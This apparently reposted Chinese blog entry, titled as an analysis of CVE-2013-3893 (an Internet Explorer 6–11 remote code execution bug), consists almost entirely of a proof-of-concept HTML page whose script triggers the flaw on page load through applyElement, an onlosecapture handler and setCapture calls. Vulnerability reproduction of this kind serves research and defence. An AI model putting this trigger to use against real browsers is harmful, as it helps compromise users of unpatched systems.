标签:
1.漏洞复现
POC如下
<html>
<script>
function trigger()
{
Math.tan(3,4);
var id_0 = document.createElement("sup");
var id_1 = document.createElement("audio");
Math.sin(0);
document.body.appendChild(id_0);
document.body.appendChild(id_1);
Math.cos(0);
id_1.applyElement(id_0);
Math.tan(3,4);
id_0.onlosecapture=function(e){
document.write("");
}
Math.sin(0);
id_0[‘outerText’]="";
Math.cos(0);
id_0.setCapture();
Math.tan(3,4);
id_1.setCapture();
Math.sin(0);
}
window.onload = function() {
trigger();
}
</script>
</html>
CVE-2013-3893分析 IE6~IE11远程代码执行
标签:
原文地址:http://www.cnblogs.com/Ox9A82/p/5357562.html
